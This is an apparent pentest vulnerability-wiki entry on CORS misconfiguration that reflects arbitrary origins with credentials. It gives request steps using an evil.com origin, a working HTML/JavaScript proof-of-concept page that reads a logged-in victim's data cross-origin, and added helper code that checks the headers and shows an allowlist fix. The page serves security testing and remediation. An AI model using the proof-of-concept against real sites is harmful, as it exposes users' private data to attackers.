Cobalt Crowdsourced Application Pentest

Cobalt Vulnerability Wiki


V14 - Config

CORS (Cross-Origin Resource Sharing) Vulnerability Leaking Sensitive Data

POC

  • Add the following HTTP request header to a request that returns sensitive data: Origin: https://www.evil.com
  • If the response carries Access-Control-Allow-Origin: https://www.evil.com together with Access-Control-Allow-Credentials: true, the server reflects whatever Origin it receives and allows the browser to send the victim's cookies with the request, so a page on any origin, trusted or not, can issue authenticated requests and read the responses. (A response of Access-Control-Allow-Origin: * is not exploitable for credentialed reads: browsers reject the wildcard when credentials are sent.)
  • Open the following HTML file in a browser that is logged in to the target and observe that the sensitive data is disclosed:

<!DOCTYPE html>
<html>
<body>
<h1>CORS PoC</h1>
<button type="button" onclick="cors()">Exploit</button>
<div id="demo"></div>
<script>
function cors() {
  var xhr = new XMLHttpRequest();
  xhr.onreadystatechange = function() {
    if (this.readyState == 4 && this.status == 200) {
      // Cross-origin read succeeded: show the victim's data on the attacker page.
      document.getElementById("demo").innerText = this.responseText;
      alert(this.responseText);
    }
  };
  // Replace URL-here with the target endpoint that returns the sensitive data.
  xhr.open("GET", "URL-here", true);
  // Send the victim's cookies with the request; only works because the
  // server answers with Access-Control-Allow-Credentials: true.
  xhr.withCredentials = true;
  xhr.send();
}
</script>
</body>
</html>
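The following is an added example, not code from the Cobalt wiki: a small JavaScript helper that applies the check in the POC steps above to a captured set of response headers and reports whether a browser would let https://www.evil.com read the response with the victim's credentials, plus a hardened server-side version that only echoes allowlisted origins. The header objects and the allowlist are constructed for the demonstration; the function names classifyCors and corsHeadersFor are my own, not part of any framework.

```javascript
// Added example (not from the Cobalt wiki). Decide, from response headers,
// whether page script running at `origin` could read a credentialed response.
// Header names are matched case-insensitively, as browsers do.
function classifyCors(origin, headers) {
  const get = (name) => {
    const key = Object.keys(headers).find((k) => k.toLowerCase() === name);
    return key === undefined ? undefined : String(headers[key]).trim();
  };
  const acao = get("access-control-allow-origin");
  const acac = get("access-control-allow-credentials");
  const credentials = acac !== undefined && acac.toLowerCase() === "true";

  if (acao === undefined) {
    return { readable: false, credentialed: false, reason: "no Access-Control-Allow-Origin header" };
  }
  if (acao === "*") {
    // Browsers refuse "*" when credentials are sent, so only anonymous reads work.
    return { readable: true, credentialed: false, reason: "wildcard origin: anonymous read only" };
  }
  if (acao !== origin) {
    return { readable: false, credentialed: false, reason: "origin not allowed: " + acao };
  }
  // The sent Origin was reflected (this also covers a reflected "null" origin,
  // reachable from a sandboxed iframe). With credentials this is the finding.
  return credentials
    ? { readable: true, credentialed: true, reason: "origin reflected with credentials" }
    : { readable: true, credentialed: false, reason: "origin reflected without credentials" };
}

// Hardened server-side logic: echo the Origin only if it is on a fixed
// allowlist, never reflect arbitrary input, and only then allow credentials.
// Returns the headers to add to the response; {} means "no CORS headers".
function corsHeadersFor(origin, allowlist) {
  if (typeof origin !== "string" || !allowlist.includes(origin)) {
    return {};
  }
  return {
    "Access-Control-Allow-Origin": origin,
    "Access-Control-Allow-Credentials": "true",
    // Vary so a shared cache never serves one origin's ACAO to another.
    "Vary": "Origin",
  };
}

// Constructed headers matching the vulnerable response described in the POC.
const EVIL_ORIGIN = "https://www.evil.com";
const VULNERABLE_RESPONSE = {
  "Access-Control-Allow-Origin": EVIL_ORIGIN,
  "Access-Control-Allow-Credentials": "true",
};
console.log(classifyCors(EVIL_ORIGIN, VULNERABLE_RESPONSE));
// The hardened handler gives the attacker origin nothing at all.
console.log(corsHeadersFor(EVIL_ORIGIN, ["https://app.example.com"]));
```

To use it against a real target, send the request with Origin: https://www.evil.com as in the first POC step, copy the response headers into the object passed to classifyCors, and treat a result with readable and credentialed both true as confirmation of the finding.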

Impact

Medium-High (depends on the criticality of sensitive data)

Likelihood

Medium-High